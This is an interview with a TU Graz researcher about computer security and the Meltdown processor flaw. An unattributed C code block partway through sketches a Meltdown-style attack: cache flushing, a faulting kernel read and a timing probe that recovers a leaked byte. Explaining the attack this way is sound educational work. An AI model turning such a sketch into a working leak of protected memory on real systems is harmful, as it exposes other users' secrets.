News+Stories: You’re a security researcher working on the security of computer systems. So, the first question: what is security?
Daniel Gruss: When a system behaves the way I want and expect it to. It doesn’t matter whether it’s a computer system or real life. In real life, for example, this could be that I expect not to get sick. In the case of computer systems, for example, this may mean that my data is treated confidentially. Security is when it does exactly what I want it to do, no more and no less. But that always depends on expectations.
How do you recognise users’ expectations?
Gruss: Sometimes it’s quite simple. If I use a password, then I expect that nobody will find out my password. If I use an encrypted hard drive, then I expect that nobody can access it. However, security must always be defined by people and is an expression of will. For example, if I don’t use a password, or use a very weak one, then that is also an expression of will and says that security is not so important to me.
Is it always such a conscious decision?
Gruss: No, absolutely not. Our world is too complex for that. But this is not only the case with computer systems. For example, if we were aware of all the health risks, we would probably behave very differently, not smoke or drink. But we don’t. It’s always about a gut feeling, an assessment. It’s the same with computers. We also need to develop a gut feeling for how we create security. For example, not to reply to every dubious spam email with your credit card number.
What kind of security are you investigating?
Gruss: In my working group, we look at the interface between hardware and software – the layer where the operating system sits. A computer system is incredibly complex, consisting of billions of transistors and millions of lines of code. No human being could survey and understand the entire system in one lifetime. That’s why we resort to abstractions. But abstractions can never reflect reality 100 per cent, and there will always be edge cases that have not been considered. And that’s exactly what we’re looking at.
A famous example is Meltdown. I first talked about this idea with a colleague when we were staying at the same hotel during a conference. I was convinced at the time that it wouldn’t work. If it were possible, I thought, then someone would certainly have discovered it by now. But nobody had. Basically, it works like this: the attack consists of a single simple instruction – the smallest piece of software I can write. This one instruction accesses the memory of the operating system, which it is not allowed to do. The program therefore crashes immediately. By that point, however, the attack is already complete. For reasons of efficiency, the processor loads the sensitive data into the cache in advance and only then checks whether the access is permitted at all. And we can read this data out of the cache.
We have developed an analogy that makes this very clear. Imagine a library with a section for banned books. When I want to borrow one of them, the librarian stops me. So I tell him that I want to borrow a permitted book that starts with the first letter on the first page of the forbidden book. The librarian, who is authorised to access it, looks in the forbidden book, puts it back and asks me: “Which book beginning with the letter R would you like to borrow?” But I’ve changed my mind, and now I want a book that starts with the second letter on the first page of the forbidden book. In this way I can read the entire banned book without ever holding it in my hands. With a human librarian this would take an incredibly long time, but our current computer systems manage four or five instructions per nanosecond. In one second, that adds up to a lot of letters.
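To make the mechanism concrete, here is a minimal sketch of what such a Meltdown-style measurement could look like in C. It is an illustration under explicit assumptions, not a working exploit: it presumes an unpatched x86-64 CPU under Linux, the kernel address is a hypothetical placeholder, and the flush, transient access and timing steps are reduced to their bare essentials.

```c
/*
 * Minimal Meltdown-style sketch -- an illustration of the idea
 * described above, NOT a working exploit. Assumes an unpatched
 * x86-64 CPU and Linux; KERNEL_ADDR is a hypothetical placeholder
 * for a kernel address the process is not allowed to read.
 * Build (hypothetically): gcc -O0 -o sketch sketch.c
 */
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <x86intrin.h>          /* _mm_clflush, __rdtscp (GCC/Clang, x86) */

#define PAGE 4096
#define KERNEL_ADDR ((volatile uint8_t *)0xffff888000000000ULL) /* placeholder */

static uint8_t probe[256 * PAGE];  /* one page per possible byte value */
static sigjmp_buf env;

/* The forbidden read raises SIGSEGV; recover instead of crashing. */
static void handler(int sig) { (void)sig; siglongjmp(env, 1); }

/* Time a single memory access: a cached line loads much faster. */
static uint64_t access_time(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

int main(void) {
    signal(SIGSEGV, handler);

    /* 1. Flush every probe slot so none of them is cached. */
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * PAGE]);

    /* 2. The single forbidden instruction. Architecturally it faults,
     *    but on affected CPUs the secret byte is forwarded transiently
     *    and used as an index before the fault takes effect -- which
     *    pulls exactly one probe page into the cache. */
    if (!sigsetjmp(env, 1)) {
        uint8_t secret = *KERNEL_ADDR;     /* faults */
        (void)probe[secret * PAGE];        /* transient cache footprint */
    }

    /* 3. Recover the byte: the one fast slot is the one that was
     *    touched transiently. (Real code strides the scan to avoid
     *    the prefetcher and repeats the whole cycle for reliability.) */
    int leaked = 0;
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < 256; i++) {
        uint64_t t = access_time(&probe[i * PAGE]);
        if (t < best) { best = t; leaked = i; }
    }
    printf("leaked byte candidate: 0x%02x\n", leaked);
    return 0;
}
```

On systems with kernel page-table isolation – the class of mitigation deployed after the Meltdown disclosure – the transient read yields nothing, so the sketch illustrates the mechanism rather than a present-day attack.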
Is it likely that such edge cases will even be found by attackers?
Gruss: Well, we thought of it. So why not people who have bad intentions?
Where do you get such ideas from?
Gruss: That’s the hardest question of all. It is a very creative process. Not all of a processor’s functions are publicly known – they are trade secrets. So we develop theories about them and consider what could have been overlooked. And then we test. But I have to say that out of 100 ideas, maybe one works. That’s wonderful from a security point of view, but of course not from a research point of view (laughs).
Why are such cases not considered directly during development?
Gruss: The goal of those who design computer systems is efficiency. So the focus is simply completely different. The whole scientific world view in this area is geared towards making things faster and better. This is not necessarily compatible with our world view, which focuses on everything that can go wrong.
Do performance and security go together at all?
Gruss: This is a question we are asking ourselves in a new project, for which I have been awarded an ERC Starting Grant. Many people think it’s a conflict: the more security I want, the more performance I lose, and vice versa. In the new project, however, we have completely different, somewhat unusual hypotheses – namely, that we can even use security to increase performance. It’s like with cars. Many decades ago, engines were already capable of driving cars at speeds of up to 200 kilometres per hour. But there were no seat belts, airbags or crumple zones yet, so even an accident at 50 kilometres per hour could be fatal. The safer the vehicles themselves became, the faster they could be driven with less risk. That shifted the boundaries. And it’s the same with computer systems. If I make a system very fast, but it miscalculates once a minute, then I won’t be very happy. But if I also make sure that this error has no disadvantage or, ideally, is not noticed at all, then I can risk a lot more. We expect performance increases of up to 20 per cent. But this is a very lengthy process. We are only at the beginning and will lay important foundations over the next five years of the project, which can then be expanded over the coming decades.
How do you secure your own systems?
Gruss: Just like everyone else. I don’t think it makes sense to be particularly paranoid here. If a secret service wants to monitor me, it will manage one way or another – the financial means to buy the best exploits are simply there. Against “conventional” attackers, however, the known security measures are sufficient: strong passwords, a password manager, two-factor authentication and always installing the latest updates.
This research area is anchored in the Field of Expertise “Information, Communication & Computing”, one of five strategic foci of TU Graz.